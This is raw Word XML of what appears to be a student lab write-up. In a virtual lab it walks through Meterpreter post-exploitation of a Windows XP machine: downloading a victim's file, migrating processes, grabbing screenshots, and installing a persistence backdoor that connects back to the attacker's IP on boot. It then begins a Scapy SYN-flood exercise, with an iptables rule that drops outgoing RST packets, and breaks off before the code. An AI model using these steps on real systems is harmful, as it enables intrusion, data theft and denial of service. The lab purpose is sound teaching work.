        <w:t>Now, we goto the Windows XP Virtual Box and select a file that we wish to transfer from the victim</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:t>s computer to attacker</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:t xml:space="preserve">s computer. I made a simple notepad file in the Windows XP machine and named it as </w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Check.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ACE1CA" w14:textId="77777777" w:rsidR="00C97FE2" w:rsidRDefault="009053A1" w:rsidP="00C97FE2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A22FD64" wp14:editId="6B5FB280">
            <wp:extent cx="5943600" cy="2519798"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38" name="Picture 38" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.4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Home/Desktop/Screen Shot 2016-02-28 at 9.47.09 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5018" cy="2520399"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="485EA560" w14:textId="77777777" w:rsidR="00C97FE2" w:rsidRDefault="00C97FE2" w:rsidP="00C97FE2"/>
    <w:p w14:paraId="71FB270B" w14:textId="77777777" w:rsidR="00C97FE2" w:rsidRDefault="00C97FE2" w:rsidP="00C97FE2"/>
    <w:p w14:paraId="4B15C2A9" w14:textId="77777777" w:rsidR="009053A1" w:rsidRPr="009053A1" w:rsidRDefault="003A6FAA" w:rsidP="009053A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="009053A1">
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r>
        <w:t>first check the working directory</w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="009053A1">
        <w:t xml:space="preserve"> with the command pwd, it </w:t>
      </w:r>
      <w:r>
        <w:t>shows</w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\Windows\system32.</w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="009053A1">
        <w:t xml:space="preserve"> By using the </w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cd .. command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a couple of times we enter</w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="009053A1">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C Directory</w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="009053A1">
        <w:t xml:space="preserve">, where the file is located. Now, by executing a simple command of </w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">download </w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Check.txt</w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r w:rsidR="009053A1" w:rsidRPr="009053A1">
        <w:t xml:space="preserve"> we download the desired file in our system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD9BC5E" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1"/>
    <w:p w14:paraId="681C15FF" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="514FDC26" wp14:editId="7FBD7D2F">
            <wp:extent cx="5943600" cy="3519170"/>
            <wp:effectExtent l="0" t="0" r="0" b="11430"/>
            <wp:docPr id="17" name="Picture 17" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.43.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Home/Desktop/Screen Shot 2016-02-28 at 9.43.46 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519170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1884CC27" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="3998B8F4" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1"/>
    <w:p w14:paraId="32FC38BD" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1"/>
    <w:p w14:paraId="11198B2C" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1"/>
    <w:p w14:paraId="1BFCC8AA" w14:textId="77777777" w:rsidR="009053A1" w:rsidRPr="009053A1" w:rsidRDefault="009053A1" w:rsidP="009053A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009053A1">
        <w:t xml:space="preserve">We are now supposed to take a </w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>screenshot of the victim</w:t>
      </w:r>
      <w:r w:rsidR="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>s machine.</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:t xml:space="preserve"> For this we first write a </w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ps command to know all the pid</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>of all the sessions running on remote host.</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:t xml:space="preserve"> We then use the command</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> migrate 1</w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>652</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:t xml:space="preserve"> This command w</w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:t>ould only concentrate on the ses</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:t>sion a</w:t>
      </w:r>
      <w:r w:rsidR="00C97FE2">
        <w:t>gainst pid 1652</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:t>. Espia is an extension of the meterpreter payloa</w:t>
      </w:r>
      <w:r w:rsidR="006B346B">
        <w:t>d to capture the victims screen</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006B346B">
        <w:t>Command</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>screengrab</w:t>
      </w:r>
      <w:r w:rsidRPr="009053A1">
        <w:t xml:space="preserve"> captures the screenshot of the Windows desktop. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAAE5A4" w14:textId="77777777" w:rsidR="009053A1" w:rsidRDefault="009053A1"/>
    <w:p w14:paraId="7638B425" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="7863DB09" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="29D6E22E" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="33AFC691" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="796189EE" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23787D0C" wp14:editId="6061EA55">
            <wp:extent cx="5943600" cy="3509010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="Picture 24" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.44.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Home/Desktop/Screen Shot 2016-02-28 at 9.44.42 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509010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF566D3" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="3A766DC4" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2767A8D4" wp14:editId="4EC4A0B6">
            <wp:extent cx="5932805" cy="3509010"/>
            <wp:effectExtent l="0" t="0" r="10795" b="0"/>
            <wp:docPr id="25" name="Picture 25" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.47.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Home/Desktop/Screen Shot 2016-02-28 at 9.47.25 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2805" cy="3509010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5DCC1F" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="656CABE2" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="150AE93A" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="5EA20DAA" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="09F32A6C" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="50AF27C8" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68563BD5" wp14:editId="4F4252CA">
            <wp:extent cx="5943600" cy="3487420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="Picture 26" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.47.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Home/Desktop/Screen Shot 2016-02-28 at 9.47.09 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487420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A96067C" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="1883B34B" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="0F81FB79" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRPr="00C35F08" w:rsidRDefault="00C35F08" w:rsidP="00C35F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve">Now, we </w:t>
      </w:r>
      <w:r w:rsidR="006B346B">
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> to install a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> persistence meterpereter</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> service on the Windows XP machine that would automatically connect back when the system boots. </w:t>
      </w:r>
      <w:r w:rsidR="006B346B">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve">ommand </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>run persistence –h</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B346B">
        <w:t xml:space="preserve">shows </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t>the available opt</w:t>
      </w:r>
      <w:r w:rsidR="006B346B">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve">ons. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D53821">
        <w:t xml:space="preserve">-X option is </w:t>
      </w:r>
      <w:r w:rsidR="006B346B">
        <w:t xml:space="preserve">used </w:t>
      </w:r>
      <w:r w:rsidRPr="00D53821">
        <w:t>because we want to start the backdoor when the system boots.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D53821">
        <w:t>-r option is for our IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0898FF6B" w14:textId="77777777" w:rsidR="00542B8B" w:rsidRDefault="00C35F08" w:rsidP="00542B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We have also defined the interval between each connection attempt as 5 seconds and the system running metasploit listening for the connect back. So, we have used</w:t>
      </w:r>
      <w:r w:rsidRPr="00B85856">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –U –X –i 5 –r options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> followed by our own IP address. </w:t>
      </w:r>
      <w:r w:rsidR="00542B8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>After the sy</w:t>
      </w:r>
      <w:r w:rsidR="003A6FAA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stem reboots we get connected, t</w:t>
      </w:r>
      <w:r w:rsidR="00542B8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hen we exit the session and then exploit we get connected to the same system again as shown in screenshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708B50A9" w14:textId="77777777" w:rsidR="00542B8B" w:rsidRDefault="00542B8B" w:rsidP="00542B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA2445A" w14:textId="77777777" w:rsidR="00542B8B" w:rsidRDefault="00542B8B" w:rsidP="00542B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B250C56" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="2756F857" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00542B8B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E6EE540" wp14:editId="3F5DA83C">
            <wp:extent cx="5943600" cy="29584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10652" b="7448"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2958465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E81E4D1" w14:textId="77777777" w:rsidR="00542B8B" w:rsidRDefault="00542B8B"/>
    <w:p w14:paraId="6833FD24" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="070BD36D" wp14:editId="6BBAB6F7">
            <wp:extent cx="5932805" cy="3466465"/>
            <wp:effectExtent l="0" t="0" r="10795" b="0"/>
            <wp:docPr id="27" name="Picture 27" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 10.03.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Home/Desktop/Screen Shot 2016-02-28 at 10.03.01 P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2805" cy="3466465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D833867" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="1E179798" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="0A1F6356" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="750A0EAC" wp14:editId="1DE1E0E3">
            <wp:extent cx="5943600" cy="3444875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="28" name="Picture 28" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.54.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Home/Desktop/Screen Shot 2016-02-28 at 9.54.38 P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444875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="713287CC" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="3A9087BC" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="55B3FD0E" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRDefault="00C35F08"/>
    <w:p w14:paraId="74FFE00B" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRDefault="00C35F08"/>
    <w:p w14:paraId="1742FDA9" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="0009F306" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="18BCCA41" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="1DA7E560" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="4D175921" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="13C312AB" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="3DAFEF21" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="2175A9FE" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="3A07496B" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="44986709" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="25B5A3F4" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="445F9FC2" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="2380A055" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="1893A1F7" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="72B94656" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="48CC47A1" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="5FE4C507" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="666779B4" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="2AB4D844" w14:textId="77777777" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA"/>
    <w:p w14:paraId="76D9756D" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRDefault="00C35F08"/>
    <w:p w14:paraId="0F7AD6CE" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRPr="002F1D6D" w:rsidRDefault="00C35F08" w:rsidP="00C35F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1D6D">
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>SCAPY/Python Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768F4837" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRDefault="00C35F08" w:rsidP="00C35F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D26CB3" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRPr="00C35F08" w:rsidRDefault="00C35F08" w:rsidP="00C35F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we need to create an </w:t>
      </w:r>
      <w:r w:rsidRPr="002F1D6D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IPTABLES rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the BackTrack5 machine to block and outgoing packets. This is done by executing the command </w:t>
      </w:r>
      <w:r w:rsidRPr="002F1D6D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sudo iptables -A OUTPUT -p tcp -s [IPADDRESSofBT5] --tcp-flags RST RST -j DROP.</w:t>
      </w:r>
      <w:r w:rsidR="00542B8B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">We then verify the command in the output chain by executing </w:t>
      </w:r>
      <w:r w:rsidRPr="002F1D6D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sudo iptables –L.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> We then create a </w:t>
      </w:r>
      <w:r w:rsidRPr="002F1D6D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>python file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> named </w:t>
      </w:r>
      <w:r w:rsidR="00542B8B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1D6D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and write our python code in it. The python file is created using the command </w:t>
      </w:r>
      <w:r w:rsidR="002E7976">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>gedit flood</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1D6D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A0FFA5" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00E557EA"/>
    <w:p w14:paraId="2B7C3715" w14:textId="77777777" w:rsidR="00E557EA" w:rsidRDefault="00A03D23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D7D1670" wp14:editId="42D2CCCF">
            <wp:extent cx="5932805" cy="3594100"/>
            <wp:effectExtent l="0" t="0" r="10795" b="12700"/>
            <wp:docPr id="33" name="Picture 33" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.17.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sers/Home/Desktop/Screen Shot 2016-02-28 at 9.17.07 P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2805" cy="3594100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5759E7CF" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23"/>
    <w:p w14:paraId="2F1EDF78" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRDefault="00C35F08"/>
    <w:p w14:paraId="4E6FCE51" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRPr="00C35F08" w:rsidRDefault="00C35F08" w:rsidP="00C35F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve">The code written below is used to send </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>syncfloods to the XP machine.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
